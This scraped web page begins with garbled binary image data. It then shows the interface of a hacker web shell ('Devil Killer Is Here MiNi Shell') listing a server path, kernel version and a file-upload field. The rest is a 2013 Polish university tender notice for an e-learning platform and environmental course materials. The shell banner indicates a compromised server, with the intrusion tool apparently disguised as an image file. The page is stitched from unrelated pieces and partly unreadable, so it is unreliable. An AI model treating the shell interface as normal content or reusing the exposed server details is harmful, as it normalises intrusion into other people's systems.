JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/181828-N-2013.html

<p class="kh_header"><b>Kraków: Wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego Politechniki Krakowskiej - platformy informatycznej wykorzystywanej w ramach szkoleń typu blended e- learning, przygotowanie materiałów dla studentów</b><br>
<b>Numer ogłoszenia: 181828 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego Politechniki Krakowskiej - platformy informatycznej wykorzystywanej w ramach szkoleń typu blended e- learning, przygotowanie materiałów dla studentów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:Wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego Politechniki Krakowskiej - platformy informatycznej wykorzystywanej w ramach szkoleń typu blended - e-learning,
Zadanie nr 2:Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended e- learning-u z zakresu Racjonalna gospodarka zasobami naturalnymi oraz prowadzenie kursu Racjonalna gospodarka zasobami naturalnymi w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia 
Zadanie nr 3:Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Godpodarka  odpadami oraz prowadzenie kursu Godpodarka  odpadami w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia 
Zadanie nr 4:Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Ochrona środowiska - pro środowiskowe technologie konstrukcyjne  oraz prowadzenie kursu Ochrona środowiska - pro środowiskowe technologie konstrukcyjne w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia 
Zadanie nr 5: Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego oraz prowadzenie kursu Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia .
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.22.41.00-2, 72.31.40.00-9, 72.51.10.00-0, 80.54.00.00-1, 80.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie częściowe nr 1:
Wykonawca biorący udział w postępowaniu musi wykazać, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie co najmniej:
jedną usługę polegającą m.in. na zaprojektowaniu, realizacji, wypełnianiu treściami, koordynacji i administrowaniu platformą dydaktyczną.
Zadania częściowe nr 2, 3, 4 i 5:
Wykonawca biorący udział w postępowaniu musi wykazać, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie co najmniej:
dwie usługi podobne rodzajowo do opisu zamówienia, tj.: każda z tych dwóch usług ma obejmować łącznie przygotowanie materiałów do kursu e-learningowego  z zakresu ochrony środowiska, ekologii itp. oraz przeprowadzenie zajęć dydaktycznych lub szkoleniowych na uczelni wyższej lub w szkole zawodowej lub w liceum dla dorosłych lub w przedsiębiorstwie metodą e-learnigową z zakresu ochrony środowiska, ekologii itp.
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych wyżej wymienionych usług należy przedstawić w załączniku nr 5 do SIWZ.
Do wykazu należy załączyć dowody, czy usługi te zostały wykonane lub są wykonywane należycie.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług zostały wcześniej wykonane, Wykonawca nie ma obowiązku składania dowodów, o których mowa wyżej.
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie Wykazu robót i dołączonych do niego dokumentów, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie częściowe nr 1:
Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje jedną osobą fizyczną, która będzie posiadać następujące kwalifikacje:
Znajomość technologii informatycznych:
-Języki programowania: PHP, JS, AWK, XML, XSLT, CSS, HTML4/5 
-Bazy danych:  Oracle 10g/11g, IBM DB2, MySQL,
-Technologie serwerowe: Apache, DNS, FTP
-Systemy operacyjne: RHEL5/Centos5 Linux + XEN, AIX-5
-CERTYFIKAT z zakresu baz danych i technologii internetowych
-Administrator sieciami i systemami internetowymi; doświadczenie w realizacji projektów z zakresu budowy lub zmiany w projektach systemów internetowych; umiejętności analityka, projektanta i programisty baz danych i systemów w oparciu o języki internetowe (PHP); doświadczenie w tworzeniu i modyfikacji interfejsów i aplikacji w oparciu o XML/XSLT, JS, PHP;

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie przedstawionego przez Wykonawcę Wykazu osób - sporządzonego zgodnie z Załącznikiem nr 4 do SIWZ.

Zadanie częściowe nr 2, 3, 4 i 5:
Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje jedną osobą fizyczną, która będzie posiadać następujące kwalifikacje:
-Wykształcenie wyższe na poziomie II stopnia (mgr/mgr inż.) w kierunku biologia, ochrona środowiska, inżynieria materiałowa lub pokrewne. Dopuszcza się wykształcenie w zakresie innego kierunku pod warunkiem co najmniej 3 lat doświadczenia zawodowego w prowadzenie tożsamych projektów
-Doświadczenie w prowadzeniu zajęć dydaktycznych/szkoleniowych na uczelni wyższej/szkole zawodowej oraz praca w przedsiębiorstwie na stanowisku związanym z tematem, do realizacji którego zostaje złożona oferta)
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie przedstawionego przez Wykonawcę Wykazu osób - sporządzonego zgodnie z Załącznikiem nr 4a do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - Załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnej w postaci aneksu, za zgodą Zamawiającego i Wykonawcy.
2.Zamawiający dopuszcza możliwość zmian treści zawartej umowy w następujących okolicznościach:
a)terminu realizacji, gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych  w umowach pomiędzy Zamawiającym a Instytucją Pośredniczącą,
b)terminu realizacji, gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej,
c)zakresu zamówienia (zmniejszenie) gdy wystąpią obiektywne przeszkody uniemożliwiające realizację Zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia.
osób przewidzianych do realizacji zamówienia w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, niewywiązywania się  z obowiązków wynikających z umowy, pod warunkiem, że osoby zaproponowane będą posiadały  kwalifikacje i doświadczenie   zgodne  z wymogiem SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, budynek W-9, pok.110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego, budynek W-9, pok.110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pełna nazwa postępowania:  Wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego Politechniki Krakowskiej - platformy informatycznej wykorzystywanej w ramach szkoleń typu blended e- learning, przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended e- learning-u z zakresu Szkolenia Ochrona Środowiska Naturalnego oraz prowadzenie następujących kursów w formule blended e-learning-u kończących się uzyskaniem certyfikatu - zaświadczenia: 1. Racjonalna gospodarka zasobami naturalnymi, 2. Gospodarka odpadami, 3. Ochrona środowiska - prośrodowiskowe technologie konstrukcyjne. 4. Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego.
Zamówienie na potrzeby Projektu MBM - kierunek zamawiany współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Zamówienie musi zostać zrealizowane w terminie:
Część 1 - zaprojektowanie - do 31.08.2013 r. Część 2 - implementacja i wdrożenie - do 01.10.2013 r. Część 3 - bieżący nadzór,: awarie, usuwanie błędów programistycznych - do 28.02. 2014 r. (semestr zimowy 2013/2014) - dla zadania częściowego: 1
Część 1 materiały 15.07.2013 r. Część 2 Prowadzenie zajęć i wydanie certyfikatów/zaświadczeń 28.02.2014 r. (semestr zimowy 2013/2014) - dla zadania częściowego: 2
Część 1 materiały 15.07.2013 r. Część 2 Prowadzenie zajęć i wydanie certyfikatów/zaświadczeń 28.02.2014 r. (semestr zimowy 2013/2014) - dla zadania częściowego: 3
Część 1 materiały 15.07.2013 r. Część 2 Prowadzenie zajęć i wydanie certyfikatów/zaświadczeń 28.02.2014 r. (semestr zimowy 2013/2014) - dla zadania częściowego: 4
Część 1 materiały 15.07.2013 r. Część 2 Prowadzenie zajęć i wydanie certyfikatów/zaświadczeń 28.02.2014 r. (semestr zimowy 2013/2014) - dla zadania częściowego: 5.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego Politechniki Krakowskiej - platformy informatycznej wykorzystywanej w ramach szkoleń typu blended - e-learning.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie pełnego projektu, implementacji i wdrożenia na serwerach Wydziału Mechanicznego PK, platformy informatycznej wykorzystywanej w ramach szkoleń typu blended- e-lerning.
System informatyczny powinien posiadać funkcjonalność zarządzania ogłoszeniami, obsługę kont trenerów oraz studentów z możliwości weryfikacji osób po rejestracji. Zaproponowane rozwiązanie musi wspierać dodawanie dowolnej ilości materiałów dydaktycznych grupowanych tematycznie w ramach prowadzonych kursów. Zarówno wykładowcy jak i studenci muszą mieć możliwość wymiany korespondencji, dodawania publicznych oraz dedykowanych wskazanym osobom materiałów. System musi wspierać dodawanie materiałów o dowolnym charakterze od dokumentów po materiały multimedialne w nieograniczonej ilości wraz z możliwością ich komentowania. Budowa systemu musi umożliwiać jego dalszy rozwój przez szybkie dodawanie nowych modułów bez konieczności zmian w już istniejących. Platforma ma umożliwiać obsługę minimum 4 kursów po 5 modułów każdy. Ze względu na innowacyjność projektu wymagana jest osoba o wykształceniu informatycznym do przygotowania i stworzenia bazy oraz administrowania kursami blended-learningu z zakresu SZKOLENIA OCHRONY ŚRODOWISKA NATURALNEGO.
Wykonawca zobowiązany jest do przeszkolenia w siedzibie Zamawiającego wskazanych przez Zamawiającego pracowników z obsługi i administrowania platformy e-learning (min. 4 osoby) w terminie od 01.10.2013 do końca 1 kwartału 2014 r. semestr zimowy roku akademickiego 2013/2014 (2 rok -3 semestr).
Technicznie platforma e-learning musi spełniać następujące cechy:
-system musi być skalowalny i umożliwiać współpracę z bazami danych różnych producentów, przy czym wymagane jest wsparcie dla serwerów MySQL 5.x oraz Oracle 10g, zgodnie z architekturą i oprogramowaniem posiadanym na serwerach Wydziału Mechanicznego PK,
-system powinien zapewnić wydajność pozwalającą na użytkowanie serwisu przez 188 użytkowników jednocześnie, przy zachowaniu zgodności z architekturą informatyczną (sprzęt i oprogramowanie) posiadaną przez Wydział Mechaniczny PK,
-układ graficzny platformy powinien ułatwiać nawigację po serwisie, 
-preferowane będą rozwiązania oparte o język PHP z możliwością stosowania technologii JS, HTML4/5, CSS2/3, XML/XSLT i pokrewne, 
-system musi mieć możliwość zarządzania min. 4 blokami szkoleniowymi przy pomocy jednej platformy blended e-learning,
-moduł zarzadzania użytkownikami musi mieć możliwość tworzenia i weryfikacji kont wraz z kategoryzacją użytkowników na studentów i trenerów oraz pełnej edycji danych użytkowników, przy zapewnieniu zgodności z wytycznymi GIODO,
-moduł kontroli przebiegu prac powinien np. prezentować postęp we wprowadzaniu danych/dokumentów,
-moduł prowadzenia korespondencji powinien dawać możliwość wprowadzania komentarzy przez studenta i trenera oraz wysyłanie i odbieranie dokumentów, których ta korespondencja dotyczy,
-system musi umożliwiać łatwą konfiguracji kursu, nazwy, opisu, formatu, harmonogramu, dostępności oraz materiałów dydaktycznych do nich w postaci dowolnych plików,
-system musi umożliwiać łatwe dodawania, usuwania, ukrywania, odsłaniania i edycji modułów oraz materiałów dydaktycznych,
-platforma powinna dawać możliwość zarządzania kalendarzem po prze konfigurowanie ram czasowych kursów z możliwością wysyłania e-maili przypominających o istotnych terminach,
-system powinien mieć możliwość rozszerzenia w przyszłości funkcjonalności m.in. ankiety i testy.
-moduł pytań i odpowiedzi FAQ powinien wspierać udzielanie odpowiedzi na pytania techniczne przez  wyznaczonego pracownik z funkcją Administratora w zdefiniowanym czasie od pojawienia się problemu,
-korzystanie z platformy blended- e-lerning nie będzie wymagało instalacji jakiegokolwiek oprogramowania na urządzeniach klientów, a jedynie konfiguracji zgodnie z przedstawionymi wymaganiami wskazanej przeglądarki internetowej, 
-materiały do kursów powinny być dostępne w ten sposób, aby każdy zarejestrowany i zweryfikowany użytkownik systemu mógł je pobierać z systemu na własny komputer,
-platforma musi mieć możliwość obsługi czcionek wielojęzykowych UTF-8,
Właścicielem platformy z pełnymi prawami do użytkowania i edycji kodu źródłowego będzie Zamawiający, Wykonawca musi przekazać wszelkie licencje i własności związane z przedmiotową platformą blended-lerning na rzecz Zamawiającego. 
Wykonawca ponosi koszty związane z:
kolokacją/hostingiem (jeśli wdrożenie nastąpi poza serwerami Wydziału Mechanicznego), wdrożeniem, kontrolą wydajności, administracją i zarządzaniem, upgradami/updatami sprzętu i oprogramowania, dokumentacją, backupami oraz wszystkimi innymi czynnościami niezbędnymi do poprawnego i bezpiecznego funkcjonowania wszystkich systemów wchodzących w skład rozwiązania dostarczonego przez wykonawcę.
Wymagania wykonawców systemu blended- e-lerning:
W ramach umowy Wykonawca w ciągu 14 dni od daty podpisania umowy uruchomi, na własnych zasobach serwerowych, system internetowy do weryfikacji stanu prac, który składać się powinien  z serwisu internetowego współpracującego z bazą danych Oracle lub MySQL według wskazań Zamawiającego. Wykonawca utrzyma uruchomiony system na własnych zasobach przez okres trwania umowy. 
Wymagana infrastruktura: 
1.	Serwer WWW z obsługą SSI, CGI, PHP, SQL, SSL, FTP, SFTP wraz z podaniem nazwy DNS i IP, minimum 25 GB powierzchni dyskowej. Certyfikat SSL serwera. Obsługa minimum 188 jednoczesnych zapytań klientów. Wymagane oświadczenie Wykonawcy w zakresie praw do użytkowania zasobów serwerowych oraz licencji na wykorzystywane oprogramowanie.
2.	Serwer bazy danych dla systemu blended-lerning oparty na systemie Oracle w wersji min. 10g oraz MySQL w wersji 5.x. Wymagana obsługa bazy danych przez oprogramowanie Oracle 10g w wersji do zastosowań komercyjnych minimum Standard Edition One lub w wersji Enterprise Edition, bez limitu użytkowników, z zapewnieniem minimum 4GB pamięci RAM dla instancji i odpowiednio serwer MySQL według wskazania Zamawiającego. Wymagane oświadczenie Wykonawcy w zakresie praw do użytkowania zasobów serwerowych i licencji na wykorzystywane oprogramowanie.
3.	Serwer WWW przyłączony będzie do publicznej sieci Internet łączem symetrycznym o przepustowości minimum 1 Gb/s. Wymagany dedykowany dla serwera adres IP wskazywany przez system DNS poprzez nazwę w domenie .mech.pk.edu.pl.
4.	Wymagana dostępność usługi (SLA) standardowa na poziomie 99,995 %.
5.	Wymagany automatyczny system tworzenia kopii zapasowej systemu.
Wykonawca wskaże w ofercie fizyczną lokalizację wykorzystywanych zasobów serwerowych (dane adresowe).
Zamawiający zastrzega, że zamówienie musi wykonywać osobiście 1 osoba fizyczna (wskazana przez Wykonawcę w ofercie), bez możliwości podzlecenia jakiejkolwiek części zamówienia na wykonanie platformy blended- e-lerning..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.22.41.00-2, 72.31.40.00-9, 72.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended e- learning-u z zakresu Racjonalna gospodarka zasobami naturalnymi oraz prowadzenie kursu Racjonalna gospodarka zasobami naturalnymi w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia.</p>
